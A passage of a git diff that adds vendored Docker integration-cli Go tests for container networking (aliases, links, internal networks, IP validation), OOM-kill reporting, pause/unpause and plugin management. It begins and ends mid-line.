"-c", "1", "169.254.8.8") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "c1", "ping", "-c", "1", "169.254.9.9") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "c2", "ping", "-c", "1", "169.254.7.7") + c.Assert(err, check.IsNil) +} + +func (s 
*DockerSuite) TestUserDefinedNetworkConnectDisconnectLink(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "foo1") + dockerCmd(c, "network", "create", "-d", "bridge", "foo2") + + dockerCmd(c, "run", "-d", "--net=foo1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // run a container in a user-defined network with a link for an existing container + // and a link for a container that doesn't exist + dockerCmd(c, "run", "-d", "--net=foo1", "--name=second", "--link=first:FirstInFoo1", + "--link=third:bar", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias FirstInFoo1 must succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo1") + c.Assert(err, check.IsNil) + + // connect first container to foo2 network + dockerCmd(c, "network", "connect", "foo2", "first") + // connect second container to foo2 network with a different alias for first container + dockerCmd(c, "network", "connect", "--link=first:FirstInFoo2", "foo2", "second") + + // ping the new alias in network foo2 + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo2") + c.Assert(err, check.IsNil) + + // disconnect first container from foo1 network + dockerCmd(c, "network", "disconnect", "foo1", "first") + + // link in foo1 network must fail + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo1") + c.Assert(err, check.NotNil) + + // link in foo2 network must succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo2") + c.Assert(err, check.IsNil) +} + +func (s *DockerNetworkSuite) TestDockerNetworkDisconnectDefault(c *check.C) { + netWorkName1 := "test1" + netWorkName2 := "test2" + containerName := "foo" + + dockerCmd(c, "network", 
"create", netWorkName1) + dockerCmd(c, "network", "create", netWorkName2) + dockerCmd(c, "create", "--name", containerName, "busybox", "top") + dockerCmd(c, "network", "connect", netWorkName1, containerName) + dockerCmd(c, "network", "connect", netWorkName2, containerName) + dockerCmd(c, "network", "disconnect", "bridge", containerName) + + dockerCmd(c, "start", containerName) + c.Assert(waitRun(containerName), checker.IsNil) + networks := inspectField(c, containerName, "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, netWorkName1, check.Commentf(fmt.Sprintf("Should contain '%s' network", netWorkName1))) + c.Assert(networks, checker.Contains, netWorkName2, check.Commentf(fmt.Sprintf("Should contain '%s' network", netWorkName2))) + c.Assert(networks, checker.Not(checker.Contains), "bridge", check.Commentf("Should not contain 'bridge' network")) +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectWithAliasOnDefaultNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + + defaults := []string{"bridge", "host", "none"} + out, _ := dockerCmd(c, "run", "-d", "--net=none", "busybox", "top") + containerID := strings.TrimSpace(out) + for _, net := range defaults { + res, _, err := dockerCmdWithError("network", "connect", "--alias", "alias"+net, net, containerID) + c.Assert(err, checker.NotNil) + c.Assert(res, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) + } +} + +func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "net1") + dockerCmd(c, "network", "create", "-d", "bridge", "net2") + + cid, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping 
first container and its alias + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // ping first container's short-id alias + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid)) + c.Assert(err, check.IsNil) + + // connect first container to net2 network + dockerCmd(c, "network", "connect", "--alias=bar", "net2", "first") + // connect second container to foo2 network with a different alias for first container + dockerCmd(c, "network", "connect", "net2", "second") + + // ping the new alias in network foo2 + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar") + c.Assert(err, check.IsNil) + + // disconnect first container from net1 network + dockerCmd(c, "network", "disconnect", "net1", "first") + + // ping to net1 scoped alias "foo" must fail + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.NotNil) + + // ping to net2 scoped alias "bar" must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar") + c.Assert(err, check.IsNil) + // ping to net2 scoped alias short-id must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid)) + c.Assert(err, check.IsNil) + + // verify the alias option is rejected when running on predefined network + out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox", "top") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) + + // verify the alias option is rejected when connecting to predefined network + out, _, err = dockerCmdWithError("network", "connect", "--alias=any", "bridge", "first") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) 
+ c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) +} + +func (s *DockerSuite) TestUserDefinedNetworkConnectivity(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "network", "create", "-d", "bridge", "br.net1") + + dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox", "top") + c.Assert(waitRun("c1.net1"), check.IsNil) + + dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox", "top") + c.Assert(waitRun("c2.net1"), check.IsNil) + + // ping first container by its unqualified name + _, _, err := dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1") + c.Assert(err, check.IsNil) + + // ping first container by its qualified name + _, _, err = dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1.br.net1") + c.Assert(err, check.IsNil) + + // ping with first qualified name masked by an additional domain. should fail + _, _, err = dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1.br.net1.google.com") + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestEmbeddedDNSInvalidInput(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "network", "create", "-d", "bridge", "nw1") + + // Sending garbage to embedded DNS shouldn't crash the daemon + dockerCmd(c, "run", "-i", "--net=nw1", "--name=c1", "debian:jessie", "bash", "-c", "echo InvalidQuery > /dev/udp/127.0.0.11/53") +} + +func (s *DockerSuite) TestDockerNetworkConnectFailsNoInspectChange(c *check.C) { + dockerCmd(c, "run", "-d", "--name=bb", "busybox", "top") + c.Assert(waitRun("bb"), check.IsNil) + + ns0 := inspectField(c, "bb", "NetworkSettings.Networks.bridge") + + // A failing redundant network connect should not alter current container's endpoint settings + _, _, err := dockerCmdWithError("network", "connect", "bridge", "bb") + c.Assert(err, check.NotNil) + + ns1 := inspectField(c, "bb", "NetworkSettings.Networks.bridge") + c.Assert(ns1, 
check.Equals, ns0) +} + +func (s *DockerSuite) TestDockerNetworkInternalMode(c *check.C) { + dockerCmd(c, "network", "create", "--driver=bridge", "--internal", "internal") + assertNwIsAvailable(c, "internal") + nr := getNetworkResource(c, "internal") + c.Assert(nr.Internal, checker.True) + + dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + out, _, err := dockerCmdWithError("exec", "first", "ping", "-W", "4", "-c", "1", "www.google.com") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "ping: bad address") + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +// Test for #21401 +func (s *DockerNetworkSuite) TestDockerNetworkCreateDeleteSpecialCharacters(c *check.C) { + dockerCmd(c, "network", "create", "test@#$") + assertNwIsAvailable(c, "test@#$") + dockerCmd(c, "network", "rm", "test@#$") + assertNwNotAvailable(c, "test@#$") + + dockerCmd(c, "network", "create", "kiwl$%^") + assertNwIsAvailable(c, "kiwl$%^") + dockerCmd(c, "network", "rm", "kiwl$%^") + assertNwNotAvailable(c, "kiwl$%^") +} + +func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) { + testRequires(t, DaemonIsLinux) + if err := s.d.StartWithBusybox("--live-restore"); err != nil { + t.Fatal(err) + } + defer s.d.Stop() + oldCon := "old" + + _, err := s.d.Cmd("run", "-d", "--name", oldCon, "-p", "80:80", "busybox", "top") + if err != nil { + t.Fatal(err) + } + oldContainerIP, err := s.d.Cmd("inspect", "-f", "{{ .NetworkSettings.Networks.bridge.IPAddress }}", oldCon) + if err != nil { + t.Fatal(err) + } + // Kill the daemon + if err := s.d.Kill(); err != nil { + t.Fatal(err) + } + + // restart the daemon + if err := s.d.Start("--live-restore"); err != nil { + t.Fatal(err) + } + + // start a new container, the new 
container's ip should not be the same with + // old running container. + newCon := "new" + _, err = s.d.Cmd("run", "-d", "--name", newCon, "busybox", "top") + if err != nil { + t.Fatal(err) + } + newContainerIP, err := s.d.Cmd("inspect", "-f", "{{ .NetworkSettings.Networks.bridge.IPAddress }}", newCon) + if err != nil { + t.Fatal(err) + } + if strings.Compare(strings.TrimSpace(oldContainerIP), strings.TrimSpace(newContainerIP)) == 0 { + t.Fatalf("new container ip should not equal to old running container ip") + } + + // start a new container, the new container should ping old running container + _, err = s.d.Cmd("run", "-t", "busybox", "ping", "-c", "1", oldContainerIP) + if err != nil { + t.Fatal(err) + } + + // start a new container, trying to publish port 80:80 should fail + out, err := s.d.Cmd("run", "-p", "80:80", "-d", "busybox", "top") + if err == nil || !strings.Contains(out, "Bind for 0.0.0.0:80 failed: port is already allocated") { + t.Fatalf("80 port is allocated to old running container, it should failed on allocating to new container") + } + + // kill old running container and try to allocate again + _, err = s.d.Cmd("kill", oldCon) + if err != nil { + t.Fatal(err) + } + id, err := s.d.Cmd("run", "-p", "80:80", "-d", "busybox", "top") + if err != nil { + t.Fatal(err) + } + + // Cleanup because these containers will not be shut down by daemon + out, err = s.d.Cmd("stop", newCon) + if err != nil { + t.Fatalf("err: %v %v", err, string(out)) + } + _, err = s.d.Cmd("stop", strings.TrimSpace(id)) + if err != nil { + t.Fatal(err) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkFlagAlias(c *check.C) { + dockerCmd(c, "network", "create", "user") + output, status := dockerCmd(c, "run", "--rm", "--network=user", "--network-alias=foo", "busybox", "true") + c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output)) + + output, status, _ = dockerCmdWithError("run", "--rm", "--net=user", "--network=user", "busybox", 
"true") + c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output)) + + output, status, _ = dockerCmdWithError("run", "--rm", "--network=user", "--net-alias=foo", "--network-alias=bar", "busybox", "true") + c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkValidateIP(c *check.C) { + _, _, err := dockerCmdWithError("network", "create", "--ipv6", "--subnet=172.28.0.0/16", "--subnet=2001:db8:1234::/64", "mynet") + c.Assert(err, check.IsNil) + assertNwIsAvailable(c, "mynet") + + _, _, err = dockerCmdWithError("run", "-d", "--name", "mynet0", "--net=mynet", "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top") + c.Assert(err, check.IsNil) + c.Assert(waitRun("mynet0"), check.IsNil) + verifyIPAddressConfig(c, "mynet0", "mynet", "172.28.99.88", "2001:db8:1234::9988") + verifyIPAddresses(c, "mynet0", "mynet", "172.28.99.88", "2001:db8:1234::9988") + + _, _, err = dockerCmdWithError("run", "--net=mynet", "--ip", "mynet_ip", "--ip6", "2001:db8:1234::9999", "busybox", "top") + c.Assert(err.Error(), checker.Contains, "invalid IPv4 address") + _, _, err = dockerCmdWithError("run", "--net=mynet", "--ip", "172.28.99.99", "--ip6", "mynet_ip6", "busybox", "top") + c.Assert(err.Error(), checker.Contains, "invalid IPv6 address") + // This is a case of IPv4 address to `--ip6` + _, _, err = dockerCmdWithError("run", "--net=mynet", "--ip6", "172.28.99.99", "busybox", "top") + c.Assert(err.Error(), checker.Contains, "invalid IPv6 address") + // This is a special case of an IPv4-mapped IPv6 address + _, _, err = dockerCmdWithError("run", "--net=mynet", "--ip6", "::ffff:172.28.99.99", "busybox", "top") + c.Assert(err.Error(), checker.Contains, "invalid IPv6 address") +} + +// Test case for 26220 +func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromBridge(c *check.C) { + out, _ := dockerCmd(c, "network", "inspect", 
"--format", "{{.Id}}", "bridge") + + network := strings.TrimSpace(out) + + name := "test" + dockerCmd(c, "create", "--name", name, "busybox", "top") + + _, _, err := dockerCmdWithError("network", "disconnect", network, name) + c.Assert(err, check.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go new file mode 100644 index 0000000000..bcf59f8601 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go @@ -0,0 +1,30 @@ +// +build !windows + +package main + +import ( + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestInspectOomKilledTrue(c *check.C) { + testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport) + + name := "testoomkilled" + _, exitCode, _ := dockerCmdWithError("run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + + c.Assert(exitCode, checker.Equals, 137, check.Commentf("OOM exit should be 137")) + + oomKilled := inspectField(c, name, "State.OOMKilled") + c.Assert(oomKilled, checker.Equals, "true") +} + +func (s *DockerSuite) TestInspectOomKilledFalse(c *check.C) { + testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport) + + name := "testoomkilled" + dockerCmd(c, "run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "echo hello world") + + oomKilled := inspectField(c, name, "State.OOMKilled") + c.Assert(oomKilled, checker.Equals, "false") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go new file mode 100644 index 0000000000..9217a69968 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go @@ -0,0 +1,66 @@ +package main + +import ( + "strings" + + 
"github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestPause(c *check.C) { + testRequires(c, IsPausable) + defer unpauseAllContainers() + + name := "testeventpause" + runSleepingContainer(c, "-d", "--name", name) + + dockerCmd(c, "pause", name) + pausedContainers, err := getSliceOfPausedContainers() + c.Assert(err, checker.IsNil) + c.Assert(len(pausedContainers), checker.Equals, 1) + + dockerCmd(c, "unpause", name) + + out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + actions := eventActionsByIDAndType(c, events, name, "container") + + c.Assert(actions[len(actions)-2], checker.Equals, "pause") + c.Assert(actions[len(actions)-1], checker.Equals, "unpause") +} + +func (s *DockerSuite) TestPauseMultipleContainers(c *check.C) { + testRequires(c, IsPausable) + defer unpauseAllContainers() + + containers := []string{ + "testpausewithmorecontainers1", + "testpausewithmorecontainers2", + } + for _, name := range containers { + runSleepingContainer(c, "-d", "--name", name) + } + dockerCmd(c, append([]string{"pause"}, containers...)...) + pausedContainers, err := getSliceOfPausedContainers() + c.Assert(err, checker.IsNil) + c.Assert(len(pausedContainers), checker.Equals, len(containers)) + + dockerCmd(c, append([]string{"unpause"}, containers...)...) 
+ + out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + + for _, name := range containers { + actions := eventActionsByIDAndType(c, events, name, "container") + + c.Assert(actions[len(actions)-2], checker.Equals, "pause") + c.Assert(actions[len(actions)-1], checker.Equals, "unpause") + } +} + +func (s *DockerSuite) TestPauseFailsOnWindowsServerContainers(c *check.C) { + testRequires(c, DaemonIsWindows, NotPausable) + runSleepingContainer(c, "-d", "--name=test") + out, _, _ := dockerCmdWithError("pause", "test") + c.Assert(out, checker.Contains, "cannot pause Windows Server Containers") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go new file mode 100644 index 0000000000..380357d303 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go @@ -0,0 +1,393 @@ +package main + +import ( + "fmt" + "os/exec" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" + + "io/ioutil" + "os" + "path/filepath" + "strings" +) + +var ( + pluginProcessName = "sample-volume-plugin" + pName = "tiborvass/sample-volume-plugin" + npName = "tiborvass/test-docker-netplugin" + pTag = "latest" + pNameWithTag = pName + ":" + pTag + npNameWithTag = npName + ":" + pTag +) + +func (s *DockerSuite) TestPluginBasicOps(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, pTag) + c.Assert(out, checker.Contains, "true") + + id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag) + id = strings.TrimSpace(id) + 
c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "is enabled") + + _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) + + _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id)) + if !os.IsNotExist(err) { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestPluginForceRemove(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(out, checker.Contains, "is enabled") + + out, _, err = dockerCmdWithError("plugin", "remove", "--force", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) +} + +func (s *DockerSuite) TestPluginActive(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + _, _, err = dockerCmdWithError("volume", "create", "-d", pNameWithTag, "--name", "testvol1") + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(out, checker.Contains, "in use") + + _, _, err = dockerCmdWithError("volume", "rm", "testvol1") + c.Assert(err, checker.IsNil) + + _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) +} + +func (s *DockerSuite) TestPluginActiveNetwork(c *check.C) { + testRequires(c, DaemonIsLinux, 
IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", npNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("network", "create", "-d", npNameWithTag, "test") + c.Assert(err, checker.IsNil) + + nID := strings.TrimSpace(out) + + out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag) + c.Assert(out, checker.Contains, "is in use") + + _, _, err = dockerCmdWithError("network", "rm", nID) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag) + c.Assert(out, checker.Contains, "is enabled") + + _, _, err = dockerCmdWithError("plugin", "disable", npNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, npNameWithTag) +} + +func (s *DockerSuite) TestPluginInstallDisable(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", "--disable", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "false") + + out, _, err = dockerCmdWithError("plugin", "enable", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, _, err = dockerCmdWithError("plugin", "disable", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, _, err = dockerCmdWithError("plugin", "remove", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) +} + +func (s *DockerSuite) TestPluginInstallDisableVolumeLs(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", 
"--disable", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + dockerCmd(c, "volume", "ls") +} + +func (s *DockerSuite) TestPluginSet(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]") + + dockerCmd(c, "plugin", "set", pName, "DEBUG=1") + + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") +} + +func (s *DockerSuite) TestPluginInstallArgs(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName, "DEBUG=1") + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") +} + +func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64) + + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + // push the image to the registry + dockerCmd(c, "push", repoName) + + out, _, err := dockerCmdWithError("plugin", "install", repoName) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "target is image") +} + +func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, _, 
err = dockerCmdWithError("plugin", "enable", pName) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "already enabled") + + _, _, err = dockerCmdWithError("plugin", "disable", pName) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "disable", pName) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "already disabled") + + _, _, err = dockerCmdWithError("plugin", "remove", pName) + c.Assert(err, checker.IsNil) +} + +func (s *DockerSuite) TestPluginCreate(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + name := "foo/bar-driver" + temp, err := ioutil.TempDir("", "foo") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(temp) + + data := `{"description": "foo plugin"}` + err = ioutil.WriteFile(filepath.Join(temp, "config.json"), []byte(data), 0644) + c.Assert(err, checker.IsNil) + + err = os.MkdirAll(filepath.Join(temp, "rootfs"), 0700) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "create", name, temp) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, _, err = dockerCmdWithError("plugin", "create", name, temp) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "already exist") + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + // The output will consists of one HEADER line and one line of foo/bar-driver + c.Assert(len(strings.Split(strings.TrimSpace(out), "\n")), checker.Equals, 2) +} + +func (s *DockerSuite) TestPluginInspect(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "ls") + 
c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, pTag) + c.Assert(out, checker.Contains, "true") + + // Find the ID first + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag) + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + c.Assert(id, checker.Not(checker.Equals), "") + + // Long form + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, id) + + // Short form + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id[:5]) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, id) + + // Name with tag form + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, id) + + // Name without tag form + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, id) + + _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) + + // After remove nothing should be found + _, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id[:5]) + c.Assert(err, checker.NotNil) +} + +// Test case for https://github.com/docker/docker/pull/29186#discussion_r91277345 +func (s *DockerSuite) TestPluginInspectOnWindows(c *check.C) { + // This test should work on Windows only + testRequires(c, DaemonIsWindows) + + out, _, err := dockerCmdWithError("plugin", "inspect", "foobar") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "plugins are not supported on this platform") + c.Assert(err.Error(), checker.Contains, 
"plugins are not supported on this platform") +} + +func (s *DockerTrustSuite) TestPluginTrustedInstall(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + trustedName := s.setupTrustedplugin(c, pNameWithTag, "trusted-plugin-install") + + installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", trustedName) + s.trustedCmd(installCmd) + out, _, err := runCommandWithOutput(installCmd) + + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "true") + + out, _, err = dockerCmdWithError("plugin", "disable", trustedName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + + out, _, err = dockerCmdWithError("plugin", "enable", trustedName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + + out, _, err = dockerCmdWithError("plugin", "rm", "-f", trustedName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + + // Try untrusted pull to ensure we pushed the tag to the registry + installCmd = exec.Command(dockerBinary, "plugin", "install", "--disable-content-trust=true", "--grant-all-permissions", trustedName) + s.trustedCmd(installCmd) + out, _, err = runCommandWithOutput(installCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, 